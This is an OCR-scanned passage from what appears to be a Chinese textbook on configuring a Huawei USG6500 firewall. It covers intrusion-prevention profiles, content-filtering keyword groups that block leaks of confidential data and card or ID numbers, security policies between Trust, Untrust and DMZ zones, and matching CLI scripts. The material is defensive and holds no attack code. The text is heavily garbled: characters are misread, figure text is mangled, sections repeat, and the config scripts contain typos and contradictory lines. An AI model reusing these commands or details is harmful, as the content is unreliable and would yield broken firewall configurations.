教 据 包 和 内容。 请 在 必要 时 使 用 阴 击 取证 功能 ! 

民意 域名 检查 司 启 用 。。。 师 外 域名 
签名 过 奸 器 
中 新 建 其 刚 有 ” 国 查看 洽 名 过 天 结果“ 仿 移 动 
_ 2h 对 象 “严重 性 “所作 系 统 “应 用 程序 “协议 。。 威 内 类 别 动作 | 编 各 

Wer1 窜 P 消 高 HTP 全 部 科 用 签名 国 

共 1 条 
例外 签名 
[WSS EE 
一 签名 ID 签名 名 称 动作 超时 时 间 《分 钟 ) 
mW 



































图 4-7 入 侵 防 御 配置 文件 profile_ips_pc 


(3) 创建 人 侵 防御 配置 文件 profile _ips_server, 配 置 签名 过 滤器 和 例外 签名 。 
选择 “对 象 "|* 安 全 配置 文件 "|* 入 侵 防 御 ”。 在 “入 侵 防御 配置 文件 ”中 , 单 击 * 新 建 ”如 
图 4-8 所 示 配 置 参数 后 单 击 “确定 ?按钮 ,完成 人 侵 防 御 配 置 文件 的 配置 。 


| profle_ips_sever 
| profile for intranet servers 


口 让 用 检测 吝 yF3 络 威胁 后 ， 系 统 会 在 设备 中 攻取 忆 含 读 由 络 党 量 威胁 和 证 码 的 数据 包 ， 可 以 在 日 志 中 查看 该 
教 据 包 内 容 * 请 在 必要 时 使 用 攻击 取证 功能 1 


天 意 域 名 检查 口 和 VN 








签名 过 滩 器 

中 新 建 其 出 彼 查看 签名 过 泛 结 果 他 移动 

名 称 对象 严重 性 “所作 系统 ”应 用 程序 “协议 威 脸 类 别 动作 

[DD ler2 服务 庙 高 FTP 全 部 采用 签名 


例外 签名 

[请 铺 2D ”| 国 汪 加 器 出 和 
签名 D 。 签名 名 称 动作 
口 74320 ProFTPd MYSQL 证 线 行 | 阳 断 














图 4-8 配置 文件 profile_profile_ips_server 参数 
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每 个 人 侵 防御 配置 文件 允许 包含 多 个 签名 过 滤器 和 多 个 例外 签名 。 

(4) 配置 安全 策略 ,允许 私 网 指定 网 段 进 行 报 文 交互 ,并 将 入 侵 防御 配置 文件 应 用 到 安 
全 策略 中 。 

选择 “策略 ”|“ 安 全 策略 ”1“ 安 全 策略 ”。 单 击 “ 新 建 ”, 选 择 “ 新 建安 全 策略 ”, 并 按 如 下 参 
数 配 置 从 Trust 到 Untrust 的 域 间 策略 后 单 击 “ 确 定 ” 按 钮 。 

参考 上 述 步 又 按 如 表 4-4 和 表 4-5 所 示 的 参数 配置 从 Trust 到 DMZ、 从 Untrust 到 
DMZ 的 域 间 策略 ,允许 Trust、Untrust 区 域 主机 访问 DMZ 区 域 主机 。 


























表 4-4 Trust 到 DMZ 配置 参数 表 4-5 Untrust 到 DMZ 配置 参数 

名 称 policy_sec_1 名 称 policy_sec 2 
源 安全 区 域 Trust 源 安 全 区 域 Untrust 
目的 安全 区 域 DMZ 目的 安全 区 域 DMZ 
源 地 址 /地 区 10. 3. 0. 0/24 目的 地 址 /地 区 10. 2.0. 0/24 
动作 允许 动作 允许 

内 容 安全 内 容 安 全 
人 侵 防御 profile_ips_pe 入侵 防御 profile_ips_server 
4. 结果 验证 


在 “监控 ”1“ 日 志 ”|“ 威 胁 日 志 ” 中 ,管理 员 定期 查看 日 志 人 信息, 发现 : 

(1) 日 志 中 记录 了 “攻击 者 ”为 Internet 用 户 地 址 ,“ 攻 击 对 象 ” 为 FTP 服务 器 地 址 ,“ 协 
议 ? 为 FTP 的 攻击 信息 , 且 “ 动 作 ” 为 “ 阻 断 ”。 

(2) 日 志 中 记录 了 ”攻击 者 ?为 内 网 用 户 地 址 ,攻击 对 象 "为 FTP 服务 器 地 址 ,“ 协 议 ” 
为 FTP 的 攻击 信息 , 且 动 作为 “ 阻 断 ”。 

(3) 日 志 中 记录 了 “攻击 者 ”为 Internet 网 站 地 址 ,“ 攻 击 对 象 * 为 内 网 用 户 地 址 “协议” 
为 HTTP 的 攻击 信息 , 且 动 作为 “ 阻 断 ”。 

5. 配置 脚本 

(1) [USG6500 Jinterface GigabitEthernet1/0/1 
LUSG6500-GigabitEthernet1/0/1Jip address 1.1.1.1 255.255.255.0 
USG6500-GigabitEthernet1/0/1Jinterface GigabitEthernetl1/0/2 
USG6500-GigabitEthernetl/0/2]ip address 10. 2.0.1 255. 255. 255.0 
USG6500-GigabitEthernet1/0/2 Jinterface GigabitEthernet1/0/3 
USG6500-GigabitEthernetl/0/3]ip address 10. 3.0.1 255. 255. 255.0 
(2) [USG6500-GigabitEthernet1/0/3 Jfirewall zone Trust 
LUSG6500-Zone-Trust Jadd interface GigabitEthernetl1/0/3 
LUSG6500-Zone-Trust Jfirewall zone Untrust 
LUSG6500-Zone-Untrust Jadd interface GigabitEthernet1/0/1 
[USG6500-Zone-Untrust Jfirewall zone DMZ 
[USG6500-Zone-DMZ Jadd interface GigabitEthernetl/0/2 
(3) [USG6500-Zone-DMZ Jprofile type ips name profile_ips_pc 


Lm gm ps Mm 





USG6500-profile-ips-profile_ips_pc |description profile for intranet users 





USG6500-profile-ips-profile_ips_pc Jsignature-set name filterl 
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USG6500-profile-ips-profile_ips_pc-sigset-filter] ]target client 
USG6500-profile-ips-profile_ips_pc-sigset-filter] |severity high 
USG6500-profile-ips-profile_ips_pc-sigset-filterl ]protocol HTTP 
ee Jprofile type ips name profile_ips_server 
ee Jdescription profile for intranet servers 
USG6500-profile-ips-profile_ips_server |signature-set name filter2 
USG6500-profile-ips-profile_ips_server-sigset-filter2 Jtarget server 
USG6500-profile-ips-profile_ips_server-sigset-filter2 |severity high 
USG6500-profile-ips-profile_ips_server-sigset-filter2 |]protocol FTP 





“** Jexception ips-signature-id 74320 action block 
USG6500-profile-ips-profile_ips_server Jsecurity-policy 
USG6500-profile-security J]rule name policy_sec_1 


USG6500-profile-security-rule-police_sec_1 Jsource-zone Trust 


USG6500-profile-security-rule-police_sec_1 
USG6500-profile-security-rule-police_sec_1 
USG6500-profile-security-rule-police_sec_1 
USG6500-profile-security-rule-police_sec_1 
USG6500-profile-security-rule-police_sec_1 


destination-zone Untrust 
source-address 10. 3. 0.0 24 
profile ips profile_ips_pc 
action permit 


rule name policy_sec_2 


USG6500-profile-security-rule-police_sec_2 |Source-zone Trust 


USG6500-profile-security-rule-police_sec_2 jsource-zone Untrust 
destination-zone DMZ 
destination-address 10. 2.0.0 24 


profile ips profile_ips_server 


USG6500-profile-security-rule-police_sec_2 
USG6500-profile-security-rule-police_sec_2 
USG6500-profile-security-rule-police_sec_2 








USG6500-profile-security-rule-police_sec_2 Jaction permit 


4.2.2 配置 内 容 过 滤 功能 


在 企业 网 关 配 置 内 容 过 滤 后 , 既 可 以 防止 公司 内 的 机 密 信 息 被 泄露 到 外 部 ,又 可 以 防止 
违规 信息 的 传播 。 

如 图 4-9 所 示 , 某 公司 在 网 络 边 界 处 部 署 了 FW 作为 安全 网 关 。 公 司 有 研发 和 财务 两 种 
用 户 ,都 部 署 在 Trust 区 域 。 公 司 的 内 网 服务 器 部 署 在 DMZ 区 域 。Internet 的 用 户 部 署 在 


Untrust 区 域 。 


GE 1/0/2 
10.2.0.1/24 





服务 器 
10.2.0.5/24 


DMZ 
10.2.0.0/24 

















Untrust 


DS 


Trust 
10.3.0.0/24 


GE 1/0/1 
1.1.1.1/24 
Ww 


GE 1/0/3 
10.3.0.1/24 

















图 4-9 内 容 过 滤 组 网 图 
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公司 希望 在 保证 网 络 正 常 使 用 的 同时 ,防止 公司 机 密 信 息 的 泄露 以 及 违规 信息 的 





























传播 。 
假定 用 户 已 经 存在 于 FW 中 ,并 且 已 经 完成 了 认证 的 配置 ,具体 配置 见 表 4-6 。 
表 4-6 配置 说 明 表 
目 标 数 据 说 明 
名 称 : policy_sec_research 安全 策略 policy_sec_research 的 作用 是 允许 研发 员 
研发 员工 的 源 安全 区 域 : Trust 工 访问 Internet, 引 用 内 容 过 滤 配 置 文件 profile_sec 
安全 策略 目的 安全 区 域 : Untrust _research 可 以 对 研发 员工 上 传 到 Internet 的 文件 、 
用 户 : research 动作 : 允许 发 送 到 Internet 的 邮件 发布 的 帖子 和 微 博 、 浏 览 网 
内 容 过 滤 : profile_data_research 页 和 搜索 的 内 容 进行 过 滤 
名 称 : policy_sec_finance 安全 策略 policy_sec_finance 的 作用 是 允许 财务 员工 
财务 员工 的 源 安全 区 域 : Trust 访问 Internet, 引 用 内 容 过 滤 配置 文件 profile_sec_ 
安全 策略 目的 安全 区 域 ， Untrust finance 可 以 对 财务 员工 上 传 到 Internet 的 文件 、 发 
用 户 : finance 动作 : 允许 送 到 Internet 的 邮件 ,发布 的 帖子 和 微 博 、 浏 览 网 页 
内 容 过 滤 : profile_data_finance 和 搜索 的 内 容 进行 过 滤 
名 称 : policy_sec_internet 
源 安全 区 域 : Untrust 安全 策略 policy_sec_internet 的 作用 是 允许 Internet 
Internet 用 户 的 | 目的 安全 区 域 : DMZ 用 户 访 问 内 网 服务 器 ,引用 内 容 过 滤 配置 文件 
安全 策略 目的 地 址 /地 区 : 10. 2. 0. 5/24 profile_sec_internet 可 以 对 Internet 用 户 从 内 网 服 
动作 : 允许 务 器 下 载 和 上 传 到 内 网 服务 器 的 文件 内 容 进 行 过 滤 
内 容 过 滤 : profile_data_internet 
名 称 file d h 内 容 过 滤 配 置 文件 profile_data_research 需要 应 用 
: profile_data_researc| 定安 这 第 赂 poliey sec recrcti 下 
名 称 : rulel 关键 字 组 keyword】 | 规则 rulel 的 作用 是 阻 断 包含 关键 字 组 keywordl 内 
应 用 : all 文件 类 型 : all 容 的 上 传 和 搜索 
研发 员工 的 内 容 方向 : 上 传 ”动作 : 阻 断 
过 滤 配 置 文件 | 名 称 : rule2 
ee 规则 rule2 的 作用 是 阻 断 包含 关键 字 组 keyword3 内 
文件 类 型 : TEXT/HTML 的 网 轨 而 肖 
方向 : 下 载 动作 : 阻 断 
名 称 Bie data fi 内 容 过 滤 配 置 文件 profile_data_finance 需要 应 用 在 
人 安全 策略 policy_sec_finance 上 
名 称 : rulel 关键 字 组 : keyword2 规则 rulel 的 作用 是 阻 断 包含 关键 字 组 keyword2 内 
应 用 : all 文件 类 型 : all 容 的 上 传 和 搜索 
财务 员工 的 内 容 方向 : 上 传 “动作 : 阻 断 
过 滤 配 置 文件 
名 称 : rule2 关键 字 组 : keyword3 
应 用 : HTTP 规则 rule2 的 作用 是 阻 断 包含 关键 字 组 keyword3 内 
文件 类 型 : TEXT/HTML 容 的 网 页 下 载 
方向 : 下 载 动作 : 阻 断 
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续 表 
目 标 数据 说 明 
lp TO A 内 容 过 滤 配 置 文件 profile_data_internet 需要 应 用 在 
ks 安全 策略 policy_sec_internet 上 
: rul :k rd2 
Internet 用 户 的 Ee 0 ”| 规则 rulel 的 作用 是 阻 断 包含 关键 字 组 keyword? 内 
sy | “ 容 
内 容 过 滤 | 方向 , 下 载 动作 : 阻 断 和 这 
配置 文件 本 
人 规则 rale2 的 作用 是 阴 断 包含 关键 字 组 keyword3 内 
方向 , 上 传 动作, 阻 断 生体 人 人 
预定 义 关键 字 : 机 密 关键 字 ( 权 
重 设置 为 1) 
自 定义 关键 字 ， 
公司 
ee “公司 机 密 "是 由 公司 定义 的 机 密 信息 关键 字 , 由 管 
| em 理 员 根据 实际 情况 确定 具体 内 容 。 本 例 中 仅 以 * 公 
文本 , 公司 机 密 权重 : 1 et 
大 司 二 二 违规 信息 "是 由 公司 定义 的 违规 信息 关键 字 , 可 能 
A 包括 敏感 .色情 .暴力 等 信息 ,由 管理 员 根据 实际 情 
gg 况 确定 具体 内 容 。 本 例 中 仅 以 “违规 信息 ”表示 
文本 违规 信息 权重 : 1 
预定 义 关键 字 ( 权 重 都 设置 为 
1) , 银行 卡号 ,信用 卡号 ,社会 安 | - 
全 号 ,身份 证 号 ,机密 关键 字 
自 定义 关键 字 ， 
公司 售 
te “公司 机 密 "是 由 公司 定义 的 机 密 信息 关键 字 , 由 管 
keyword2 | 匹配 机 武文 本 理 员 根据 实际 情况 确定 具体 内 容 。 本 例 中 仅 以 “ 公 
文本 : 公司 机 密 “权重 : 1 人 
pa 违规 信息 "是 由 公司 定义 的 违规 信息 关键 字 , 可 能 
人 包括 敏感 .色情 .暴力 等 信息 ,由 管理 员 根据 实际 情 
hae 况 确 定 具 体内 容 。 本 例 中 仅 以 “违规 信息 "表示 
文本 : 违规 信息 权重 : 1 
自 定义 关键 字 : 公司 违规 信息 
vod， | 名 称 : 公司 违规 信息 
匹配 模式 : 文本 
文本 : 违规 信息 权重 : 1 
1. 配置 思路 


配置 接口 IP 地 址 和 安全 区 域 ,完成 网 络 基 本 参数 配置 。 
(1) 新 建 关键 字 组 keywordl 、keyword2 、keyword3 ,便于 下 面 步骤 中 的 内 容 过 滤 配 置 文 





件 引 用 。 
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(2) 为 研发 员工 财务 员工 Internet 用 户 分 别 新 建 内 容 过 滤 配 置 文件 。 新 建 内 容 过 滤 
配置 文件 时 需要 引用 关键 字 组 。 

(3) 为 研发 员工 、 财 务 员工 、Internet 用 户 分 别 配置 安全 策略 ,在 保证 网 络 可 达 的 同时 引 
用 各 自 的 内 容 过 滤 配 置 文件 ,实现 内 容 过 滤 。 

2. 操作 步骤 

(1) 配置 接口 IP 地 址 和 安全 区 域 ,完成 网 络 基本 参数 配置 。 

选择 “网 络 ”1“ 接 口 ”, 单 击 GE1/0/1 对 应 的 国 , 按 如 下 参数 (安全 区 域 : Untrust; IP 地 
址 ; 1.1.1.1/24) 参 数 配 置 后 单 击 “ 应 用 ”; 单 击 GE1/0/2 接口 对 应 的 国 , 按 (安全 区 域 ， 
DMZ; IP 地 址 : 10. 2. 0. 1/24) 参 数 配 置 后 单 击 “ 应 用 ”; 单 击 GE1/0/3 接口 对 应 的 国 , 按 
(安全 区 域 : Trust; IP 地 址 : 10. 3. 0. 1/24) 参 数 配 置 后 单 击 “ 应 用 ”按钮 。 

(2) 新 建 关键 字 组 。 

选择 “对 象 "|“ 关 键 字 组 ”在 “关键 字 组 "中 单 击 “ 新 建 ”。 在 “名 称 ” 中 输入 keyword1。 
在 “预定 义 ” 下 的 “机 密 关 键 字 ”对 应 的 “权重 ”输入 框 中 分 别 输 入 1。 

在 “关键 字 列表 ”中 单 击 “ 新 建 ”"。 按 照 参 数 ( 名 称 : 公司 机 密 信 息 ; 匹配 模式 : 文本 ; 文 
本 : 公司 机 密 ; 权重 : 1) 配 置 自 定义 关键 字 * 公 司机 密 信息 ”。 单 击 “ 确 定 ” 按 钮 ,完成 自 定义 
关键 字 “ 公 司机 密 信息 ”的 配置 。 

在 “关键 字 列 表 ” 中 单 击 “ 新 建 "。 按 照 参数 (名 称 : 公司 违规 信息 ; 匹配 模式 ; 文本 ; 文 
本 : 公司 机 密 ; 权重 : 1) 配 置 自 定义 关键 字 “ 公 司 违 规 信息 ”。 单 击 “ 确 定 ” 按 钮 ,完成 自 定义 
关键 字 “ 公 司 违规 信息 ”的 配置 。 

单 击 “确定 ”按钮 ,完成 关键 字 组 keyword1 的 配置 。 

类 似 地 ,按照 图 4-10 所 示 参 数 配置 keyword2 。 











名 称 keyword2 
指 述 
关键 字 列 表 
中 新 建 种 出 际 
夯 F、 描述 | 四 了 模式 | 文本 /正则 表达 式 权重 <1-255>(®3) 
4 自 定义 
”公司 违规 信息 文本 违规 信息 1 
口 公司 机 密 信息 文本 公司 机 密 1 
4 预定 义 
银行 卡号 RR 行 卡 S 正则 表达 式 殷 行 卡号 1 
信用 卡号 可 信用 卡号 正 风 表达 式 信用 卡号 1 
社会 安全 号 可 社会 安全 号 。。 正则 表达 式 社会 安全 号 1 
身份 证 号 [9 身份 证 号 正 刚 表达 式 身份 证 号 [+ | 
机 密 关键 字 [四 本 机 宇 关 键 字 正则 表达 式 机 树 关 键 字 日 


图 4-10 ”keyword2 配置 参数 


类 似 地 ,按照 图 4-11 所 示 参 数 配 置 keyword3。 

(3) 新 建 内 容 过 滤 配 置 文件 。 

选择 “对 象 "|* 安 全 配置 文件 "|* 内 容 过 滤 ”, 单 击 * 新 建 ", 按 如 图 4-12 所 示 参 数 配置 研 
发 员工 的 内 容 过 滤 配 置 文件 profile_data_research 。 
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(2) 为 研发 员工 财务 员工 Internet 用 户 分 别 新 建 内 容 过 滤 配 置 文件 。 新 建 内 容 过 滤 
配置 文件 时 需要 引用 关键 字 组 。 

(3) 为 研发 员工 、 财 务 员工 、Internet 用 户 分 别 配置 安全 策略 ,在 保证 网 络 可 达 的 同时 引 
用 各 自 的 内 容 过 滤 配 置 文件 ,实现 内 容 过 滤 。 

2. 操作 步骤 

(1) 配置 接口 IP 地 址 和 安全 区 域 ,完成 网 络 基本 参数 配置 。 

选择 “网 络 ”1“ 接 口 ”, 单 击 GE1/0/1 对 应 的 国 , 按 如 下 参数 (安全 区 域 : Untrust; IP 地 
址 ; 1.1.1.1/24) 参 数 配 置 后 单 击 “ 应 用 ”; 单 击 GE1/0/2 接口 对 应 的 国 , 按 (安全 区 域 ， 
DMZ; IP 地 址 : 10. 2. 0. 1/24) 参 数 配 置 后 单 击 “ 应 用 ”; 单 击 GE1/0/3 接口 对 应 的 国 , 按 
(安全 区 域 : Trust; IP 地 址 : 10. 3. 0. 1/24) 参 数 配 置 后 单 击 “ 应 用 ”按钮 。 

(2) 新 建 关键 字 组 。 

选择 “对 象 "|“ 关 键 字 组 ”在 “关键 字 组 "中 单 击 “ 新 建 ”。 在 “名 称 ” 中 输入 keyword1。 
在 “预定 义 ” 下 的 “机 密 关 键 字 ”对 应 的 “权重 ”输入 框 中 分 别 输 入 1。 

在 “关键 字 列表 ”中 单 击 “ 新 建 ”"。 按 照 参 数 ( 名 称 : 公司 机 密 信 息 ; 匹配 模式 : 文本 ; 文 
本 : 公司 机 密 ; 权重 : 1) 配 置 自 定义 关键 字 * 公 司机 密 信息 ”。 单 击 “ 确 定 ” 按 钮 ,完成 自 定义 
关键 字 “ 公 司机 密 信息 ”的 配置 。 

在 “关键 字 列 表 ” 中 单 击 “ 新 建 "。 按 照 参数 (名 称 : 公司 违规 信息 ; 匹配 模式 ; 文本 ; 文 
本 : 公司 机 密 ; 权重 : 1) 配 置 自 定义 关键 字 “ 公 司 违 规 信息 ”。 单 击 “ 确 定 ” 按 钮 ,完成 自 定义 
关键 字 “ 公 司 违规 信息 ”的 配置 。 

单 击 “确定 ”按钮 ,完成 关键 字 组 keyword1 的 配置 。 

类 似 地 ,按照 图 4-10 所 示 参 数 配置 keyword2 。 











名 称 keyword2 
指 述 
关键 字 列 表 
中 新 建 种 出 际 
夯 F、 描述 | 四 了 模式 | 文本 /正则 表达 式 权重 <1-255>(®3) 
4 自 定义 
”公司 违规 信息 文本 违规 信息 1 
口 公司 机 密 信息 文本 公司 机 密 1 
4 预定 义 
银行 卡号 RR 行 卡 S 正则 表达 式 殷 行 卡号 1 
信用 卡号 可 信用 卡号 正 风 表达 式 信用 卡号 1 
社会 安全 号 可 社会 安全 号 。。 正则 表达 式 社会 安全 号 1 
身份 证 号 [9 身份 证 号 正 刚 表达 式 身份 证 号 [+ | 
机 密 关键 字 [四 本 机 宇 关 键 字 正则 表达 式 机 树 关 键 字 日 


图 4-10 ”keyword2 配置 参数 


类 似 地 ,按照 图 4-11 所 示 参 数 配 置 keyword3。 

(3) 新 建 内 容 过 滤 配 置 文件 。 

选择 “对 象 "|* 安 全 配置 文件 "|* 内 容 过 滤 ”, 单 击 * 新 建 ", 按 如 图 4-12 所 示 参 数 配置 研 
发 员工 的 内 容 过 滤 配 置 文件 profile_data_research 。 
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名 称 keyword3 
据 述 
关键 字 列 表 
中 新 尘 舌 遇 除 
-一 名 称 描述 匹配 模式 文本 /正则 表达 式 | 权重 <1-255>@® 
4 自 定义 
公司 违规 信息 文本 违规 信息 1 
图 4-11 keyword3 配置 参数 
名 称 profile_data_research 
指 述 
内 容 过 涯 规则 
中 新 建 甘 遇 除 
-名称 | 关键 字 组 应 用 文件 类 型 方向 动作 | 。 寺 警 装 值 。。 阻 断 国 值 编辑 | 
口 mle1 keyword1 全 部 全 部 上 传 。 阻 断 - - 国 
口 mez keyword3 HTTP TEXTHTML T 载 。 阳新 - - 国 


图 4-12 ”研发 员工 的 内 容 过 滤 配 置 参 数 
单 击 “ 新 建 ”, 按 如 图 4-13 所 示 参 数 配置 财务 员工 的 内 容 过 滤 配置 文件 profile_data_ 


finance。 


名 称 profile_data_finance 

指 述 

内 容 过 滩 规 则 

中 新 建 跨 吓 除 

癌 名称 关键 字 组 应 用 | 文件 类 型 方向 “动作 告警 而 值 。 阴 断 闻 值 。。 。 编辑 
口 mey keyword2 全 部 全 部 上 传 。。 阻 断 - < 国 
muile2 keyword3 HTTP TEXTHTML TT 载 。 阳 断 - - 国 


图 4-13 ”研发 员工 的 内 容 过 滤 配 置 参数 
单 击 “ 新 建 ”, 按 如 图 4-14 所 示 参 数 配 置 Internet 用 户 的 内 容 过 滤 配 置 文件 profile_data_ 


internet 。 





名 称 profile_data_internet 

描述 

内 容 过 涝 规则 

中 新建 种 且 除 

名 称 关键 字 组 。 “应 用 文件 类 型 方向 。 动作。 | 告 旨 说 值 。 阻 断 闻 值 编辑。 
| mle1 keyword2 全 部 全 部 TT 载 。 阳 断 国 
DD mle2 keyword3 全 部 全 部 上 传 阳 断 : : 国 


图 4-14 JInternet 的 内 容 过 滤 配 置 参数 
(4) 配置 安全 策略 并 引用 内 容 过 滤 配 置 文件 。 
选择 “策略 |* 安 全 策略 "|* 安 全 策略 ”, 单 击 “ 新 建 ", 选 择 * 新 建安 全 策略 ”。 按 如 表 4-7 
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所 示 参 数 配置 研发 员工 的 安全 策略 。 
参考 上 述 步骤 , 按 如 表 4-8 所 示 参 数 配置 财务 员工 的 安全 策略 。 


表 4-7 研发 员工 安全 策略 配置 参数 























名 称 policy_sec_research 
描述 允许 研发 员工 访问 Internet 
源 安全 区 域 Trust 
目的 安全 区 域 Untrust 
用 户 /default/research 
动作 允许 
内 容 过 滤 profile_data_research 


表 4-8 财务 员工 安全 策略 配置 参数 























名 称 policy_sec_finance 

描述 允许 财务 员工 访问 Internet 
源 安全 区 域 Trust 

目的 安全 区 域 Untrust 

用 户 /default/finance 

动作 允许 

内 容 过 滤 profile_data_finance 


参考 上 述 步 又 按 如 表 4-9 所 示 参 数 配 置 Internet 用 户 的 安全 策略 。 
表 4-9 Internet 用 户 安全 策略 配置 参数 























名 称 policy_sec_internet 
描述 允许 Internet 用 户 访问 内 网 服务 器 
源 安全 区 域 Untrust 
目的 安全 区 域 DMZ 
目的 地 址 /地 区 10. 2. 0. 5/24 
动作 允许 
内 容 过 滤 profile_data_internet 
3. 结果 验证 


内 网 研发 员工 发 送 包含 公司 机 密 信 息 的 内 容 到 Internet 或 者 浏览 和 搜索 包含 违规 信息 
的 内 容 时 ,内 容 被 阻 断 。 

内 网 财务 员工 发 送 包 含 公司 机 密 信息 和 员工 信息 的 内 容 到 Internet 或 者 浏览 和 搜索 包 
含 违规 信息 的 内 容 时 ,内容 被 阻 断 。 

Internet 用 户 从 内 网 服务 下 载 包含 公司 机 密 信 息 和 员工 信息 的 文件 时 ,下 载 文件 失败 。 
Internet 用 户 上 传 包含 违规 信息 的 文件 到 内 网 服务 器 时 ,上 传 文件 失败 。 

如 果 想 查看 内 容 阻 断 时 的 日 志 详 细 信 息 ,可 以 查看 "内容 日 志 ”。 方 法 如 下 : 

选择 “监控 ”1“ 日 志 ”|1“ 内 容 日 志 ”, 单 击 “ 高 级 查询 ”, 选 择 “ 类 型 "为 “内 容 过 滤 ”。 单 击 
“查询 ”, 可 以 看 到 内 容 过 滤 功 能 的 日 志 。 
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4. 配置 脚本 

sysname FW 

(1) interface GigabitEthernetl/0/1 

undo shutdown 

ip address 1.1.1.1 255.255.255.0 
interface GigabitEthernetl/0/2 

undo shutdown 

ip address 10. 2.0.1 255. 255. 255. 0 
interface GigabitEthernetl/0/3 

undo shutdown 

ip address 10. 3. 0.1 255. 255. 255. 0 

(2) firewall zone trust 

add interface GigabitEthernetl1/0/3 
firewall zone DMZ 

add interface GigabitEthernet1/0/2 

firewall zone Untrust 

add interface GigabitEthernet1/0/1 

(3) keyword-group name keyword1 
pre-defined-keyword name confidentiality weight 1 
user-defined-keyword name 公司 机 密 信 息 
expression match-mode text 公司 机 密 
weight 1 

user-defined-keyword name 公司 违规 信息 
expression match-mode text 违规 信息 
weight 1 

keyword-group name keyword2 
pre-defined-keyword name bank-card-number weight 1 


pre-defined-keyword name credit-card-number weight 1 


pre-defined-keyword name social-security-number weight 1 


pre-defined-keyword name id-card-number weight 1 
pre-defined-keyword name confidentiality weight 1 
user-defined-keyword name 公司 机 密 信息 
expression match-mode text 公司 机 密 

weight 1 

user-defined-keyword name 公司 违规 信息 
expression match-mode text 违规 信息 

weight 1 

keyword-group name keyword3 
user-defined-keyword name 公司 违规 信息 
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expression match-mode text 违规 信息 
weight 1 

profile type data-filter name profile_data_research 
rule name rulel 

keyword-group name keyword1l 
file-type all 

application all 

direction upload 

action block 

rule name rule2 

keyword-group name keyword3 
file-type name TEXTVHTML 
application type HTTP 

direction download 

action block 

profile type data-filter name profile_data_finance 
rule name rulel 

keyword-group name keyword2 
file-type all 

application all 

direction upload 

action block 

rule name rule2 

keyword-group name keyword3 
file-type name TEXTVHTML 
application type HTTP 

direction download 

action block 

profile type data-filter name profile_data_internet 
rule name rulel 

keyword-group name keyword2 
file-type all 

application all 

direction download 

action block 

rule name rule2 

keyword-group name keyword3 
file-type all 


application all 
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direction upload 

action block 

(4) security-policy 

rule name policy_sec_research 
description 允许 研发 员工 访问 Internet 
source-zone Trust 

destination-zone Untrust 

user user-group /default/research 
profile data-filter profile_data_research 
action permit 

rule name policy_sec_finance 
description 允许 财务 员工 访问 Internet 
source-zone Trust 

destination-zone Untrust 

user user-group /default/finance 
profile data-filter profile_data_finance 
action permit 

rule name policy_sec_internet 
description 允许 Internet 用 户 访问 内 网 服务 器 
source-zone Untrust 

destination-zone DMZ 
destination-address 10. 2.0.0 24 
profile data-filter profile_data_internet 


action permit 
4.2.3 内 网 管控 与 安全 隔离 


大 中 型 企业 的 内 网 构成 往往 比较 复杂 ,通过 USG6000 部 署 在 企业 内 网 能 够 对 网 络 进 
行 安全 隔离 ,对 内 网 流量 进行 精细 化 控制 。 

对 于 大 中 型 企业 ,通常 其 内 部 网 络 也 需要 划分 安全 等 级 。 例 如 ,研发 网 络 、 生 产 网 络 、 营 
销 网 络 之 间 需 要 进行 隔离 ,并 对 不 同 网 络 间 的 流量 进行 监控 ,以 实现 以 下 目的 : 

。 不同 网 络 的 业务 类 型 和 安全 风险 不 同 , 需 要 部 署 不 同 的 安全 策略 ; 

。 不 同 网 络 间 的 流量 需要 受 控 ,避免 企业 核心 信息 资产 通过 网 络 泄露 ; 

。 将 网 络 进行 隔离 ,避免 一 个 网 络 感染 病毒 扩散 到 整个 企业 内 网 。 

大 部 分 流量 主要 发 生 在 同一 网 络 内 ,而 同一 网 络 内 的 流量 传输 往往 无 须 过 多 干预 。 所 
以 通过 网 络 划分 ,可 以 降低 安全 设备 的 检测 负担 ,提高 检测 效率 ,使 网 络 更 加 通畅 。 

基于 以 上 特征 ,USG6000 作为 大 中 型 企业 的 内 网 边界 ,典型 的 应 用 场景 如 图 4-15 所 示 。 

在 内 网 部 署 一 个 或 多 个 USG6000 作为 内 部 不 同 网 络 的 边界 网 关 , 隔 离 不 同 网 络 。 

建立 用 户 管理 体系 ,对 内 网 主机 接 人 进行 用 户 权限 控制 。 

相同 安全 等 级 的 网 络 划 分 到 同一 个 安全 区 域 .只 部 署 少 量 的 安全 功能 ,例如 “研发 部 1” 
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direction upload 

action block 

(4) security-policy 

rule name policy_sec_research 
description 允许 研发 员工 访问 Internet 
source-zone Trust 

destination-zone Untrust 

user user-group /default/research 
profile data-filter profile_data_research 
action permit 

rule name policy_sec_finance 
description 允许 财务 员工 访问 Internet 
source-zone Trust 

destination-zone Untrust 

user user-group /default/finance 
profile data-filter profile_data_finance 
action permit 

rule name policy_sec_internet 
description 允许 Internet 用 户 访问 内 网 服务 器 
source-zone Untrust 

destination-zone DMZ 
destination-address 10. 2.0.0 24 
profile data-filter profile_data_internet 


action permit 
4.2.3 内 网 管控 与 安全 隔离 


大 中 型 企业 的 内 网 构成 往往 比较 复杂 ,通过 USG6000 部 署 在 企业 内 网 能 够 对 网 络 进 
行 安全 隔离 ,对 内 网 流量 进行 精细 化 控制 。 

对 于 大 中 型 企业 ,通常 其 内 部 网 络 也 需要 划分 安全 等 级 。 例 如 ,研发 网 络 、 生 产 网 络 、 营 
销 网 络 之 间 需 要 进行 隔离 ,并 对 不 同 网 络 间 的 流量 进行 监控 ,以 实现 以 下 目的 : 

。 不同 网 络 的 业务 类 型 和 安全 风险 不 同 , 需 要 部 署 不 同 的 安全 策略 ; 

。 不 同 网 络 间 的 流量 需要 受 控 ,避免 企业 核心 信息 资产 通过 网 络 泄露 ; 

。 将 网 络 进行 隔离 ,避免 一 个 网 络 感染 病毒 扩散 到 整个 企业 内 网 。 

大 部 分 流量 主要 发 生 在 同一 网 络 内 ,而 同一 网 络 内 的 流量 传输 往往 无 须 过 多 干预 。 所 
以 通过 网 络 划分 ,可 以 降低 安全 设备 的 检测 负担 ,提高 检测 效率 ,使 网 络 更 加 通畅 。 

基于 以 上 特征 ,USG6000 作为 大 中 型 企业 的 内 网 边界 ,典型 的 应 用 场景 如 图 4-15 所 示 。 

在 内 网 部 署 一 个 或 多 个 USG6000 作为 内 部 不 同 网 络 的 边界 网 关 , 隔 离 不 同 网 络 。 

建立 用 户 管理 体系 ,对 内 网 主机 接 人 进行 用 户 权限 控制 。 

相同 安全 等 级 的 网 络 划 分 到 同一 个 安全 区 域 .只 部 署 少 量 的 安全 功能 ,例如 “研发 部 1” 
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图 4-15 内 网 管控 与 安全 隔离 典型 部 署 


